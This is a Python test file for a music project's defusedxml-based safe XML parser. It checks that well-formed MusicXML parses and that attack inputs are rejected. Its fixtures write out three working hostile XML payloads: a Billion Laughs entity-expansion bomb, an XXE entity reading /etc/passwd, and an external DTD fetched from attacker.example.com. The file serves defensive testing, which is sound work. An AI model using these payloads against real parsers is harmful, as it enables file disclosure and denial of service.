cgcardona / muse public
test_core_xml_safe.py python
181 lines 6.3 KB
368bcde6 Add security test coverage and reference documentation Gabriel Cardona <gabriel@tellurstori.com> 9h ago
1 """Tests for muse.core.xml_safe — defusedxml typed adapter.
2
3 These tests verify that:
4 1. SafeET.parse() correctly parses well-formed XML / MusicXML files.
5 2. SafeET.parse() blocks XML entity expansion attacks (Billion Laughs).
6 3. SafeET.parse() blocks external entity injection (XXE).
7 4. The returned ElementTree is a standard stdlib ElementTree instance.
8 5. The ParseError, Element, and ElementTree types are correctly re-exported.
9 """
10
11 from __future__ import annotations
12
13 import pathlib
14 import xml.etree.ElementTree as StdET
15
16 import pytest
17
18 from muse.core.xml_safe import SafeET
19
20
21 # ---------------------------------------------------------------------------
22 # Helpers — test XML file factories
23 # ---------------------------------------------------------------------------
24
25
26 def _write(path: pathlib.Path, content: str) -> pathlib.Path:
27 path.write_text(content, encoding="utf-8")
28 return path
29
30
31 def _minimal_musicxml(tmp_path: pathlib.Path) -> pathlib.Path:
32 xml = """\
33 <?xml version="1.0" encoding="UTF-8"?>
34 <score-partwise version="3.1">
35 <part id="P1">
36 <measure number="1">
37 <note><pitch><step>C</step><octave>4</octave></pitch><duration>4</duration></note>
38 </measure>
39 </part>
40 </score-partwise>
41 """
42 return _write(tmp_path / "score.xml", xml)
43
44
45 def _billion_laughs_xml(tmp_path: pathlib.Path) -> pathlib.Path:
46 """Classic entity expansion DoS payload (Billion Laughs)."""
47 xml = """\
48 <?xml version="1.0"?>
49 <!DOCTYPE lolz [
50 <!ENTITY lol "lol">
51 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
52 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
53 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
54 ]>
55 <root>&lol4;</root>
56 """
57 return _write(tmp_path / "billion_laughs.xml", xml)
58
59
60 def _xxe_file_xml(tmp_path: pathlib.Path) -> pathlib.Path:
61 """External entity reference attempting to read /etc/passwd."""
62 xml = """\
63 <?xml version="1.0"?>
64 <!DOCTYPE foo [
65 <!ELEMENT foo ANY>
66 <!ENTITY xxe SYSTEM "file:///etc/passwd">
67 ]>
68 <foo>&xxe;</foo>
69 """
70 return _write(tmp_path / "xxe.xml", xml)
71
72
73 def _external_dtd_xml(tmp_path: pathlib.Path) -> pathlib.Path:
74 """DTD pulled from an external URL — should be forbidden."""
75 xml = """\
76 <?xml version="1.0"?>
77 <!DOCTYPE root SYSTEM "http://attacker.example.com/evil.dtd">
78 <root>data</root>
79 """
80 return _write(tmp_path / "ext_dtd.xml", xml)
81
82
83 # ---------------------------------------------------------------------------
84 # Happy path
85 # ---------------------------------------------------------------------------
86
87
88 class TestSafeETParse:
89 def test_parses_minimal_musicxml(self, tmp_path: pathlib.Path) -> None:
90 path = _minimal_musicxml(tmp_path)
91 tree = SafeET.parse(path)
92 assert tree is not None
93
94 def test_returns_element_tree_instance(self, tmp_path: pathlib.Path) -> None:
95 path = _minimal_musicxml(tmp_path)
96 tree = SafeET.parse(path)
97 assert isinstance(tree, StdET.ElementTree)
98
99 def test_getroot_returns_element(self, tmp_path: pathlib.Path) -> None:
100 path = _minimal_musicxml(tmp_path)
101 tree = SafeET.parse(path)
102 root = tree.getroot()
103 assert root is not None
104 assert root.tag == "score-partwise"
105
106 def test_find_works_on_result(self, tmp_path: pathlib.Path) -> None:
107 path = _minimal_musicxml(tmp_path)
108 tree = SafeET.parse(path)
109 root = tree.getroot()
110 assert root is not None
111 note = root.find(".//note")
112 assert note is not None
113
114 def test_accepts_str_path(self, tmp_path: pathlib.Path) -> None:
115 path = _minimal_musicxml(tmp_path)
116 tree = SafeET.parse(str(path))
117 assert tree.getroot() is not None
118
119 def test_accepts_pathlib_path(self, tmp_path: pathlib.Path) -> None:
120 path = _minimal_musicxml(tmp_path)
121 tree = SafeET.parse(path)
122 assert tree.getroot() is not None
123
124 def test_nonexistent_file_raises(self, tmp_path: pathlib.Path) -> None:
125 with pytest.raises((FileNotFoundError, StdET.ParseError)):
126 SafeET.parse(tmp_path / "nonexistent.xml")
127
128
129 # ---------------------------------------------------------------------------
130 # Security — attack XML must be blocked
131 # ---------------------------------------------------------------------------
132
133
134 class TestSafeETSecurity:
135 def test_billion_laughs_is_blocked(self, tmp_path: pathlib.Path) -> None:
136 """Entity expansion (Billion Laughs DoS) must be rejected by defusedxml."""
137 path = _billion_laughs_xml(tmp_path)
138 with pytest.raises(Exception):
139 SafeET.parse(path)
140
141 def test_xxe_is_blocked(self, tmp_path: pathlib.Path) -> None:
142 """External entity reference (XXE credential theft) must be rejected."""
143 path = _xxe_file_xml(tmp_path)
144 with pytest.raises(Exception):
145 SafeET.parse(path)
146
147 def test_external_dtd_reference_does_not_fetch(self, tmp_path: pathlib.Path) -> None:
148 """An external DTD reference in the DOCTYPE must not trigger a network
149 request. defusedxml either raises or parses without fetching; in both
150 cases no network call should occur. We verify there is no connection
151 attempt by relying on the offline test environment — if defusedxml
152 silently ignores the SYSTEM reference the parse can succeed (the DTD is
153 not actually applied), which is also acceptable.
154 """
155 path = _external_dtd_xml(tmp_path)
156 # defusedxml may raise or succeed — both are safe outcomes.
157 # What is never acceptable: fetching the remote URL.
158 try:
159 SafeET.parse(path)
160 except Exception:
161 pass # Blocking the DTD by raising is the strictest safe outcome.
162
163
164 # ---------------------------------------------------------------------------
165 # Type re-exports
166 # ---------------------------------------------------------------------------
167
168
169 class TestSafeETReexports:
170 def test_parse_error_is_xml_parse_error(self) -> None:
171 """SafeET.ParseError must be the stdlib ParseError for generic catching."""
172 assert SafeET.ParseError is StdET.ParseError
173
174 def test_element_is_xml_element(self) -> None:
175 assert SafeET.Element is StdET.Element
176
177 def test_element_tree_is_xml_element_tree(self) -> None:
178 assert SafeET.ElementTree is StdET.ElementTree
179
180 def test_parse_method_exists(self) -> None:
181 assert callable(SafeET.parse)